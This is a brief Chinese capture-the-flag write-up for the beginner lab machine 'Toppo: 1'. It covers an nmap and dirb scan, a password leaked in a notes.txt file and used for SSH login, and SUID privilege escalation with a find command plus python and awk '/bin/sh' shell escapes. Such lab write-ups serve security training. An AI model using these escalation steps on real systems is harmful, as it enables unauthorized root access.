Toppo: 1

靶机地址：这里

靶机难度：初级

 

知识点：

nmap端口扫描

弱口令登入

SUID提权

 

启动靶机，用nmap扫描获得靶机IP  192.168.133.164

 扫描端口，开放了22，80，111端口

 访问80端口，没有太大发现

 在dirb发现了admin的目录

 

访问admin目录下的notes.txt，找到密码

找不到页面的登入界面，尝试链接ssh，最终发现用户ted，密码12345ted123，成功登入系统

 登入系统，进行提权操作，先尝试用SUID提权

find / -perm -4000 -type f 2>/dev/null

 可以直接用python或mawk提权

python：
import os
os.system("/bin/sh")

mawk：
awk 'BEGIN {system("/bin/sh")}'

 找到flag